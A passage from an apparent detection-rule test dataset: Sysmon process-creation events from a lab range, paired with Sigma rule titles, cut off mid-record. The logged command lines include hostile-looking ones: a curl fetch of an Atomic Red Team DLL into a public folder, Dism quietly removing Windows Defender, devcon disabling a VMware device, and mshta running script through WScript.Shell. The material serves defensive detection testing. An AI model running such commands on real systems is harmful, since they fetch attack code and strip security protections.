    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-11T06:51:23.281436Z\"\n        }\n      },\n      \"EventRecordID\": 21706,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-11 06:51:23.255\",\n      \"ProcessGuid\": \"0197231E-69EB-693A-1313-000000000800\",\n      \"ProcessId\": 13896,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\curl.exe\",\n      \"FileVersion\": \"8.10.1\",\n      \"Description\": \"The curl executable\",\n      \"Product\": \"The curl executable\",\n      \"Company\": \"curl, https://curl.se/\",\n      \"OriginalFileName\": \"curl.exe\",\n      \"CommandLine\": \"curl  file:///C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\calc.dll\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": 
\"MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681\",\n      \"ParentProcessGuid\": \"0197231E-F570-6938-8A10-000000000800\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml",
    "content": "id: 4dfcc9a3-f555-4692-aa17-bca049de2f61\ndescription: N/A\ndate: 2025-12-11\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: aa6f6ea6-0676-40dd-b510-6e46f02d8867\n      title: Local File Read Using Curl.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:23:21.381915Z\"\n        }\n      },\n      \"EventRecordID\": 8613670,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:23:21.362\",\n      \"ProcessGuid\": \"5AA13A44-CF49-68FC-2630-000000004002\",\n      \"ProcessId\": 9032,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\curl.exe\",\n      \"FileVersion\": \"8.13.0\",\n      \"Description\": \"The curl executable\",\n      \"Product\": \"The curl executable\",\n      \"Company\": \"curl, https://curl.se/\",\n      \"OriginalFileName\": \"curl.exe\",\n      \"CommandLine\": \"curl  -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\\\\users\\\\public\\\\music\\\\allthethingsx64.dll\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n 
     \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=A1BD7848E36F22021C68F4F24EDFDB7ACE42FCA3,MD5=90939B67542D77A32042B7C1945623B1,SHA256=3345339164CF384EFF527B6C3160FEA8D849A4231EC6CA80513E3A739E505168,IMPHASH=6C25E5A258C8C037CD5FBE44B10E696F\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_susp_download/info.yml",
    "content": "id: e2254736-78df-48bf-acd9-e36f914e21bc\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468\n      title: Suspicious Curl.EXE Download\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_devcon_disable_vmci_driver/85f520e7-6f5e-43ca-874c-222e5bf9c0de.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2026-01-23T03:54:56.824925Z\"\n        }\n      },\n      \"EventRecordID\": 23370,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2026-01-23 03:54:56.816\",\n      \"ProcessGuid\": \"0197231E-F110-6972-3D16-000000000800\",\n      \"ProcessId\": 12132,\n      \"Image\": \"C:\\\\Program Files (x86)\\\\Windows Kits\\\\10\\\\Tools\\\\10.0.26100.0\\\\x64\\\\devcon.exe\",\n      \"FileVersion\": \"10.0.26100.6584 (WinBuild.160101.0800)\",\n      \"Description\": \"Device Console\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"DevCon.exe\",\n      \"CommandLine\": \"devcon.exe  disable \\\"ROOT\\\\VMWVMCIHOSTDEV\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Program Files (x86)\\\\Windows Kits\\\\10\\\\Tools\\\\10.0.26100.0\\\\x64\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n  
    \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=36A56121DBE964347C859F95E996B26F,SHA256=282FF232C35FCB82DAD2FDAE56C775523409494B175A5A83D7441B5FA65CB3F9,IMPHASH=A0225EB3236EA941773B705076ADA2AF\",\n      \"ParentProcessGuid\": \"0197231E-F0B6-6972-3816-000000000800\",\n      \"ParentProcessId\": 4244,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_devcon_disable_vmci_driver/info.yml",
    "content": "id: 00d836cd-522f-41c8-b6a5-e1bf5d1d388d\ndescription: N/A\ndate: 2026-01-23\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 85f520e7-6f5e-43ca-874c-222e5bf9c0de\n      title: Devcon Execution Disabling VMware VMCI Device\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_devcon_disable_vmci_driver/85f520e7-6f5e-43ca-874c-222e5bf9c0de.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:41:03.540138Z\"\n        }\n      },\n      \"EventRecordID\": 8933629,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:41:03.533\",\n      \"ProcessGuid\": \"5AA13A44-D36F-68FC-CE30-000000004002\",\n      \"ProcessId\": 5956,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\DirLister.exe\",\n      \"FileVersion\": \"2.0.0.0\",\n      \"Description\": \"DirLister.UI\",\n      \"Product\": \"DirLister.UI\",\n      \"Company\": \"DirLister\",\n      \"OriginalFileName\": \"DirLister.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Users\\\\Administrator\\\\Downloads\\\\DirLister.exe\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=561771830EDE663651F3E6D731656D5D9E2BB19A,MD5=909E97D239C54B4563B61573FAE63C22,SHA256=C939927D7AB06E05B1B6E4951E8F7C45E54BA4EC3CA9399D7E1D9F5CA67C849C,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744\",\n      \"ParentProcessGuid\": \"5AA13A44-D070-68FB-1A18-000000004002\",\n      \"ParentProcessId\": 7680,\n      \"ParentImage\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\explorer.exe\\\" /NoUACCheck\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_dirlister_execution/info.yml",
    "content": "id: 3e64088e-d05c-4e03-ac62-d5961672d33e\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: b4dc61f5-6cce-468e-a608-b48b469feaa2\n      title: DirLister Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:44:33.440907Z\"\n        }\n      },\n      \"EventRecordID\": 8999629,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:44:33.433\",\n      \"ProcessGuid\": \"5AA13A44-D441-68FC-E330-000000004002\",\n      \"ProcessId\": 7112,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\reg.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Registry Console Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"reg.exe\",\n      \"CommandLine\": \"reg  query \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\" /v CurrentBuildNumber\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      
\"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=E65FAA187D27D84106B78B909C06D405837EC64E,MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries/info.yml",
    "content": "id: 23b1ddfe-cb7d-4e2f-9ae3-d96eabe0f6e1\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 0022869c-49f7-4ff2-ba03-85ac42ddac58\n      title: System Information Discovery via Registry Queries\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:47:34.903176Z\"\n        }\n      },\n      \"EventRecordID\": 9055342,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:47:34.894\",\n      \"ProcessGuid\": \"5AA13A44-D4F6-68FC-F430-000000004002\",\n      \"ProcessId\": 7808,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\Dism.exe\",\n      \"FileVersion\": \"10.0.20348.2849 (WinBuild.160101.0800)\",\n      \"Description\": \"Dism Image Servicing Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"DISM.EXE\",\n      \"CommandLine\": \"Dism  /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      
\"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=0AABFEC24BA5FC8806492DCCE89094743219EDE4,MD5=0B1CB657FF6BF807D830A5B970ECC041,SHA256=1B1EC450CE9B4559C6A2AE8ED5D8715F5135BE20257DC84ED11EBB814F29A1F2,IMPHASH=7B40129B2F7F51468E0954D5A44D9CDD\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_dism_remove/info.yml",
    "content": "id: b4459771-0fe5-4777-be95-ea6fce92d1fc\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 43e32da2-fdd0-4156-90de-50dfd62636f9\n      title: Dism Remove Online Package\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T23:53:43.425641Z\"\n        }\n      },\n      \"EventRecordID\": 33534161,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-26 23:53:43.425\",\n      \"ProcessGuid\": \"5AA13A44-B487-68FE-7F5F-000000004002\",\n      \"ProcessId\": 2052,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\driverquery.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Queries the drivers on a system\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"drvqry.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\driverquery.exe\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Windows\\\\Temp\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=67241EC6E9855CEE71833940C4BB504BB1A50298,MD5=F4D90639E3DA5F6C514495F20AE0322A,SHA256=2202CE439C7DE1CECABA76534B5B7646E0BE585E72E129C86D6B8AFB67F7D212,IMPHASH=033B70299A7F2D13D2CCD201F2FD5461\",\n      \"ParentProcessGuid\": \"5AA13A44-B487-68FE-7E5F-000000004002\",\n      \"ParentProcessId\": 11360,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\mshta.exe\",\n      \"ParentCommandLine\": \"mshta  \\\"javascript:new ActiveXObject('WScript.Shell').Run('driverquery.exe');close();\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_driverquery_recon/info.yml",
    "content": "id: 585f7fa9-392b-4609-b324-4701482de7ec\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 9fc3072c-dc8f-4bf7-b231-18950000fadd\n      title: Potential Recon Activity Using DriverQuery.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T23:47:36.476583Z\"\n        }\n      },\n      \"EventRecordID\": 33403755,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-26 23:47:36.462\",\n      \"ProcessGuid\": \"5AA13A44-B318-68FE-4B5F-000000004002\",\n      \"ProcessId\": 8840,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\driverquery.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Queries the drivers on a system\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"drvqry.exe\",\n      \"CommandLine\": \"driverquery\",\n      \"CurrentDirectory\": \"C:\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=67241EC6E9855CEE71833940C4BB504BB1A50298,MD5=F4D90639E3DA5F6C514495F20AE0322A,SHA256=2202CE439C7DE1CECABA76534B5B7646E0BE585E72E129C86D6B8AFB67F7D212,IMPHASH=033B70299A7F2D13D2CCD201F2FD5461\",\n      \"ParentProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ParentProcessId\": 10048,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_driverquery_usage/info.yml",
    "content": "id: 13b0c2d7-2056-4ce4-85df-79f7e499dd49\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: a20def93-0709-4eae-9bd2-31206e21e6b2\n      title: DriverQuery.EXE Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:48:36.392892Z\"\n        }\n      },\n      \"EventRecordID\": 9075053,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:48:36.383\",\n      \"ProcessGuid\": 